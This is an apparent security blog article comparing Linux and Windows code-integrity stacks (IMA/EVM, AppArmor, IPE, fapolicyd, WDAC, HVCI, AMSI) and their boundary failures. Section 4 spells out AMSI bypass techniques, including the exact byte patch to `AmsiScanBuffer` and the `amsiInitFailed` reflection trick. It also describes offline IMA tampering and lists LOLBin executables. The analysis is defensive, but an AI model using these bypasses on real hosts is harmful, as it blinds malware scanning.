# Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

> Linux and Windows answer one question -- "is this code allowed to run?" -- with very different machinery. Where the verifier lives matters more than how strong it is.

*Published: 2026-05-16*
*Canonical: https://paragmali.com/blog/two-routes-to-code-integrity-linux-ima--apparmor-vs-windows-*
*License: CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/*

---
<TLDR>
Linux and Windows have spent fifteen years answering the same question -- "is this code allowed to run?" -- and arrived at radically different architectures. Linux composes half a dozen narrow kernel modules (IMA, EVM, AppArmor, SELinux, fs-verity, IPE) plus a userspace daemon (`fapolicyd`); Windows ships one integrated suite (App Control + HVCI + AMSI + Smart App Control). Both stacks shipped their v1 with the **check in the wrong place**, and the architectural pivots that fixed it -- EVM's HMAC-sealed xattrs, HVCI's hypervisor-isolated verifier, IPE's property-based decisions -- are the breakthrough lesson of this comparison. Crypto is solved. Trust-boundary protection and policy expressiveness are not, and Rice's theorem says they never fully will be.
</TLDR>

## 1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in `amsi.dll`. The [Antimalware Scan Interface](/blog/amsi-the-100-microsecond-window-where-defender-catches-a-bas/), the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of `AmsiScanBuffer` has been patched to `mov eax, 0; ret` (`B8 00 00 00 00 C3`).

The interface ships exactly as Microsoft documents it, and the function still has the [signature in MSDN](https://learn.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer): the attacker did not need to break anything. They needed only to write into the address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's `security.ima` extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in `security.ima`, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has [no defence against this offline-rewrite attack](https://lwn.net/Articles/394170/) -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about **where the check runs**. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

## 2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is **code integrity** itself, often abbreviated CI: a gate on the file's content or its signer. Did this `.so` come from a package my distribution signed? Does this `.exe` match an [Authenticode chain](/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/) rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is **mandatory access control**, or MAC. Now the process is running. What can it do? Can `nginx` open `/etc/shadow`? Can `mshta.exe` spawn `cmd.exe`? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

<Definition term="Mandatory Access Control (MAC)">
A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.
</Definition>

The third layer is **content inspection**: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships [AMSI](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a [Linux Security Module hook](https://www.kernel.org/doc/html/latest/security/lsm.html). IMA registers at `bprm_check` (the kernel hook that fires when a binary is about to be executed), `file_mmap` with `MAY_EXEC`, `module_check`, `firmware_check`, and `kexec_*`. AppArmor and SELinux register at the syscall-level access hooks. `fapolicyd` rides on top of `fanotify`. IPE hooks `op=EXECUTE`. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

<Definition term="Linux Security Module (LSM)">
The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".
</Definition>

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- [Hypervisor-protected Code Integrity, HVCI](https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity). The AMSI scan bridge runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as [Smart App Control](/blog/mark-of-the-web-smartscreen-and-the-catalog-of-trust-how-win/).

<Definition term="TPM Platform Configuration Register (PCR)">
A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with `PCR_new = SHA256(PCR_old || measurement)`. Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.
</Definition>

The architectural philosophy comes down to a sentence each. Linux trusts the **kernel surface** and packs every integrity mechanism into it as a separate LSM. Windows trusts a **hypervisor-isolated secure kernel** and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

<Mermaid caption="The three layers of code-integrity enforcement, and where Linux and Windows place each mechanism.">
flowchart LR
  subgraph CI[Code integrity: gate on file content or signer]
    direction TB
    L_IMA[Linux: IMA + EVM]
    L_IPE[Linux: IPE]
    L_FSV[Linux: fs-verity]
    L_FAP[Linux: fapolicyd]
    W_WDAC[Windows: App Control / WDAC]
    W_HVCI[Windows: HVCI / Memory Integrity]
    W_SAC[Windows: Smart App Control]
  end
  subgraph MAC[Mandatory access control: gate on running process behaviour]
    direction TB
    L_AA[Linux: AppArmor]
    L_SE[Linux: SELinux]
    W_NONE[Windows: no direct analogue, closest is AppContainer / ASR]
  end
  subgraph CS[Content inspection: gate on the buffer the interpreter will evaluate]
    direction TB
    W_AMSI[Windows: AMSI]
    L_GAP[Linux: no production equivalent]
  end
  CI --> MAC --> CS
</Mermaid>

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

## 3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, [*Design and Implementation of a TCG-based Integrity Measurement Architecture*](https://www.usenix.org/legacy/events/sec04/tech/sailer.html), shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a [TPM platform configuration register](/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/), and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The [performance evaluation](https://www.usenix.org/legacy/events/sec04/tech/full_papers/sailer/sailer_html/node19.html) measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the `file_mmap` LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.

<Sidenote>Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.</Sidenote>

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at `bprm_check`, `file_mmap`, and `module_check`, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return `-EPERM` when a file's hash did not match `security.ima`, [merged in Linux 3.7 in December 2012](https://lwn.net/Articles/488906/). The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." [Mimi Zohar's appraisal patchset](https://lwn.net/Articles/487700/) is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the [Ubuntu AppArmor wiki](https://wiki.ubuntu.com/AppArmor), "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in [Linux 2.6.36](https://docs.kernel.org/admin-guide/LSM/apparmor.html). Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux) is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

<Aside label="Why AppArmor's upstream journey took seven years">
SELinux's type-enforcement model maps directly to LSM's "label the subject, label the object, look up the rule" hook signature. AppArmor's path-based reasoning does not. LSM hooks see inodes, not paths -- and an inode can be reached from many paths (bind mounts, hard links, namespace games, chroots). To merge, AppArmor had to push kernel-side helpers like `vfs_path_lookup` and `d_absolute_path` upstream so it could reconstruct the absolute path of the object at hook time. The conceptual fight took three rejected merge attempts and seven years. The lesson is one Linux kernel reviewers have repeated since: a security model is not just an algorithm, it is a commitment to a particular kind of name-resolution semantics.
</Aside>

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is [still supported on modern Windows but "isn't getting new feature improvements"](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview); the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with [AMSI](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to *App Control for Business*. User-mode code integrity (UMCI) became a policy option, FilePath rules were [added in Windows 10 version 1903](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview), multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in [Windows 11 22H2 in September 2022](https://blogs.windows.com/windowsexperience/2022/09/20/available-today-the-windows-11-2022-update/).

<Mermaid caption="Code-integrity lineages on Linux and Windows, 2003 to 2024. Linux composes; Windows consolidates.">
gantt
  title Linux and Windows code-integrity timeline
  dateFormat YYYY-MM
  axisFormat %Y
  section Linux
  SELinux mainline 2.6.0    :2003-12, 12M
  AppArmor at Immunix       :1998-01, 84M
  AppArmor default in Ubuntu :2007-10, 36M
  IMA mainline 2.6.30        :2009-06, 32M
  EVM mainline 3.2           :2012-01, 2M
  EVM digital sigs 3.3       :2012-03, 9M
  IMA-appraise 3.7           :2012-12, 24M
  AppArmor mainline 2.6.36   :2010-10, 14M
  fs-verity 5.4              :2019-11, 60M
  IPE 6.12                   :2024-11, 12M
  section Windows
  AppLocker (Win 7)          :2009-10, 70M
  Device Guard + AMSI + PowerShell 5 (1507) :2015-07, 25M
  WDAC UMCI (1709)           :2017-10, 18M
  FilePath rules + multi-policy (1903) :2019-05, 24M
  HVCI broadens (Win 10 1607+) :2016-08, 60M
  Smart App Control (Win 11 22H2) :2022-09, 24M
  App Control for Business rename :2024-01, 12M
</Mermaid>

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

## 4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

### Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at `bprm_check` and stored the reference hash in the file's `security.ima` extended attribute. That pairing -- file and reference hash on the same disk -- is everything an attacker with offline disk access needs to defeat the check. Mount the filesystem from another box, swap the binary for a malicious one, recompute the hash over the new binary, write the new value into `security.ima`. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: ["IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks."](https://lwn.net/Articles/394170/)

The [EVM v5 patchset](https://lwn.net/Articles/443038/), posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

### Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in [*How AMSI helps you defend against malware*](https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps): "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls `AmsiInitialize`, then for every plain-text script buffer it is about to execute calls [`AmsiScanBuffer`](https://learn.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer) or `AmsiScanString`. The call is routed through `amsi.dll`, loaded into the host process, which dispatches to the registered `IAntimalwareProvider` COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

1. Patch `AmsiScanBuffer`'s prologue in memory to `mov eax, 0; ret` (`B8 00 00 00 00 C3`). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
2. Set `System.Management.Automation.AmsiUtils.amsiInitFailed = true` via reflection. PowerShell checks the flag on every scan path and short-circuits.
3. Unload `amsi.dll` via `FreeLibrary`. There is no scanner left to call.

Microsoft tracks this so closely that its own ["Applications that can bypass App Control"](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol) deny list calls out the AMSI-bypass-capable versions of `system.management.automation.dll` by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.

<Sidenote>The same Microsoft bypass list also enumerates `mshta.exe`, `wscript.exe`, `cscript.exe`, `msbuild.exe`, `Microsoft.Build.dll`, `windbg.exe`, `cdb.exe`, `kd.exe`, `dotnet.exe`, `csi.exe`, `rcsi.exe`, `addinprocess.exe`, `wmic.exe`, `bash.exe`, `wsl.exe`, `runscripthelper.exe`, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.</Sidenote>

> **Note:** The host process making the AMSI call is the same process the attacker is running in. Any defence-in-depth plan that treats AMSI as a hard control is mis-specified. Treat AMSI as a high-quality telemetry surface feeding Defender for Endpoint and EDR pipelines; budget for the bypass.

<RunnableCode lang="js" title="Why AMSI's trust boundary is wrong: the simplest model of an in-process bypass">{`
// In Windows, AMSI scans each plain-text script buffer just before
// the scripting engine evaluates it. The scanner lives in amsi.dll,
// loaded into the script host process. The attacker who controls
// that process can rewrite the function's first few bytes.
//
// This toy model shows the consequence: once "patched", the scanner
// returns CLEAN regardless of input, and the assertion below holds
// for every possible payload.

const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) {
  if (patched) return AMSI_RESULT_CLEAN;
  if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE;
  return AMSI_RESULT_CLEAN;
}

console.log("Normal mode:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", false));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\\nAfter six-byte patch:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", true));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched.
// Strengthening AMSI's signature engine cannot fix this. The scanner
// must move out of the script host's address space.
`}</RunnableCode>

### Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A [WDAC policy](/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/) that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes `mshta.exe`, `wscript.exe`, `cscript.exe`, `msbuild.exe`, `wmic.exe`, `system.management.automation.dll`, and the 40-plus other binaries enumerated on Microsoft's own [App Control bypass list](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol). The [LOLBAS community catalogue](https://lolbas-project.github.io/) widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at *signer* granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at *binary* granularity (the specific `mshta.exe` that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.
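The granularity mismatch can be sketched in a few lines. A toy decision function (real App Control policies are signed XML compiled to binary; the hash values and policy shape here are illustrative):

```javascript
// Toy model of the signer-vs-binary mismatch: the allow rule is at
// signer granularity, the exploit is at binary granularity, so the
// policy only holds if explicit hash-level denies keep pace.
const policy = {
  allowedSigners: ["Microsoft Corporation"],
  deniedHashes: new Set(["hash-of-known-bad-mshta"]), // hypothetical value
};

function wdacDecide(file) {
  if (policy.deniedHashes.has(file.hash)) return "deny"; // denies win
  if (policy.allowedSigners.includes(file.signer)) return "allow";
  return "deny"; // default-deny for everything unsigned or unknown
}

const mshta = { name: "mshta.exe", signer: "Microsoft Corporation", hash: "hash-of-known-bad-mshta" };
const notepad = { name: "notepad.exe", signer: "Microsoft Corporation", hash: "hash-of-notepad" };
const dropper = { name: "dropper.exe", signer: "Unknown LLC", hash: "hash-of-dropper" };

console.log("mshta.exe:  ", wdacDecide(mshta));   // deny -- only because of the explicit hash deny
console.log("notepad.exe:", wdacDecide(notepad)); // allow -- rides the signer rule
console.log("dropper.exe:", wdacDecide(dropper)); // deny
```

Remove the `deniedHashes` entry and `mshta.exe` sails through on its signer alone -- which is exactly why Microsoft's bypass list exists and keeps growing.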

### Story D: fapolicyd's permissive-window failure

[fapolicyd](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/security_hardening/assembly_blocking-and-allowing-applications-using-fapolicyd_security-hardening) is the Red Hat userspace allowlister. It sits on the `fanotify` permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is a pair of operational footguns. Setting `permissive=1` "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- a userspace daemon instead of a kernel-mode hook -- is what makes both failure modes possible.
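The decision logic reduces to three branches. A toy sketch of the fanotify permission path (the function and its parameters are illustrative; the real timeout and verdict plumbing live in the kernel's fanotify code):

```javascript
// Toy model of fapolicyd's liveness problem: the kernel delegates the
// verdict to a userspace daemon, and both failure modes resolve to
// "allow" -- one by configuration, one by timeout.
function fanotifyPermissionCheck(daemonAlive, permissive, isTrusted) {
  if (!daemonAlive) return "allow"; // nobody answered before the timeout: fail open
  if (permissive) return "allow";   // permissive=1: log the event, enforce nothing
  return isTrusted ? "allow" : "deny";
}

console.log("enforcing, untrusted:", fanotifyPermissionCheck(true, false, false)); // deny
console.log("permissive=1:        ", fanotifyPermissionCheck(true, true, false));  // allow
console.log("daemon killed:       ", fanotifyPermissionCheck(false, false, false)); // allow
```

Contrast with a kernel-resident LSM hook: there is no daemon to kill and no timeout to outwait, so the fail-open branch simply does not exist.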

> **Key idea:** The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

| Bypass class | Stack | Concrete example | Root cause |
|---|---|---|---|
| Offline metadata swap | IMA without EVM | Rewrite binary and matching `security.ima` xattr from rescue media | Reference value stored next to the file under attacker control |
| In-process scanner patch | AMSI in PowerShell | `mov eax, AMSI_RESULT_CLEAN; ret` over `AmsiScanBuffer` prologue | Scanner shares address space with the script host the attacker runs in |
| Signer-vs-binary mismatch | WDAC Publisher rules | Allow Microsoft-signed code, attacker runs `mshta.exe` | Trust grant is coarser than the exploitable unit |
| Daemon liveness | fapolicyd | Terminate `fapolicyd` or set `permissive=1` | Verifier is a userspace process with no kernel-rooted backstop |

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed and fixed it -- Linux in 2012, Windows in 2016 -- in very different ways that obey the same principle.

## 5. The architectural pivots

Both lineages reached the same conclusion at the same time: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

### EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- `security.ima`, `security.selinux`, `security.SMACK64`, `security.apparmor`, `security.capability` -- plus inode metadata (UID, GID, mode, generation), and stores the result in `security.evm`. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The [kernel keyring documentation for trusted and encrypted keys](https://www.kernel.org/doc/html/latest/security/keys/trusted-encrypted.html) describes the substrate.

An offline attacker with disk access still cannot forge `security.evm` without the HMAC key. Digital-signature mode (EVM digital signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC was not new in 2012. What changed was that the *reference value* the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in [*Enhancing security with the kernel integrity subsystem*](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/security_hardening/enhancing-security-with-the-kernel-integrity-subsystem_security-hardening).

<Definition term="Extended Verification Module (EVM)">
The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in `security.evm`. Without the EVM key, an offline attacker cannot rewrite a binary and its matching `security.ima` to produce a valid pair.
</Definition>

<Mermaid caption="IMA + EVM appraisal flow at bprm_check. EVM verifies the integrity of the xattr IMA reads; without EVM, IMA's reference value is offline-rewritable.">
sequenceDiagram
  participant App as User app
  participant K as Kernel
  participant FS as Filesystem
  participant IMA as IMA
  participant EVM as EVM
  participant TPM as TPM keyring
  App->>K: execve("/usr/bin/foo")
  K->>IMA: bprm_check hook
  IMA->>FS: read file bytes
  IMA->>IMA: compute SHA-256
  IMA->>FS: read security.ima xattr
  IMA->>EVM: verify xattr integrity
  EVM->>FS: read security.evm and full xattr set
  EVM->>TPM: HMAC key from keyring (sealed to PCRs)
  EVM->>EVM: recompute HMAC over xattr set + inode meta
  alt HMAC matches and IMA hash matches
    EVM-->>IMA: ok
    IMA-->>K: allow
    K-->>App: exec proceeds
  else mismatch
    EVM-->>IMA: -EPERM
    IMA-->>K: deny
    K-->>App: -EPERM
  end
</Mermaid>

### IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return `-EPERM` on a hash mismatch, [merged in Linux 3.7 in December 2012](https://lwn.net/Articles/488906/). Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

### HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. [Virtualization-Based Security (VBS)](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small [secure kernel](/blog/when-system-isnt-enough-the-windows-secure-kernel-and-the-en/) hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

<Definition term="Virtualization-Based Security (VBS) / VTL0 vs VTL1">
Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.
</Definition>

[Microsoft's HVCI documentation](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor.

<Sidenote>"HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".</Sidenote>

<Mermaid caption="HVCI relocates the kernel-mode code-integrity check into VTL1. A VTL0 attacker with SYSTEM cannot reach the verifier.">
flowchart TD
  subgraph VTL0[VTL0: normal Windows kernel]
    P[User process]
    DRV[Driver load request]
    RK[Hypothetical rootkit with SYSTEM]
    K0[NT kernel]
    P --> K0
    DRV --> K0
    RK --> K0
  end
  K0 -->|hypercall: verify driver| HV[Hypervisor]
  RK -.X.-> SK
  HV --> SK
  subgraph VTL1[VTL1: secure kernel]
    SK[Secure kernel]
    CI[Kernel-mode CI verifier]
    SK --> CI
  end
  CI -->|allow / deny| HV
  HV -->|result| K0
</Mermaid>

### IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. [Integrity Policy Enforcement](https://docs.kernel.org/admin-guide/LSM/ipe.html), upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series ([source on GitHub](https://github.com/microsoft/ipe)), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

```
op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY
```

The kernel is not asked "what is the SHA-256 of this file?" at `op=EXECUTE` time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.
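The decision shape is easy to model. The sketch below is a toy Python rendering of first-match evaluation over precomputed properties -- the rule tuples and the `decide` helper are invented for illustration and are not the kernel's implementation:

```python
# Toy model of IPE's decision shape: rules match on precomputed
# properties of the executing file, never on a per-access hash.
# Property names mirror the documented policy language; the
# evaluation logic is an illustrative simplification.

RULES = [
    # (operation, required properties, action)
    ("EXECUTE", {"dmverity_signature": True}, "ALLOW"),
    ("EXECUTE", {"fsverity_signature": True}, "ALLOW"),
    ("EXECUTE", {}, "DENY"),  # default deny for EXECUTE
]

def decide(op: str, props: dict) -> str:
    """First rule whose property constraints all hold wins."""
    for rule_op, required, action in RULES:
        if rule_op != op:
            continue
        if all(props.get(k) == v for k, v in required.items()):
            return action
    return "DENY"

# A binary from a signed dm-verity volume: its properties were fixed
# when the volume was set up, so the per-exec decision is a lookup.
print(decide("EXECUTE", {"dmverity_signature": True}))   # ALLOW
print(decide("EXECUTE", {"dmverity_signature": False}))  # DENY
```

The per-access cost is a dictionary probe, which is the whole point of the design: the expensive verification happened once, at image-signing and volume-setup time.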

### fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is [fs-verity](https://www.kernel.org/doc/html/latest/filesystems/fsverity.html), upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

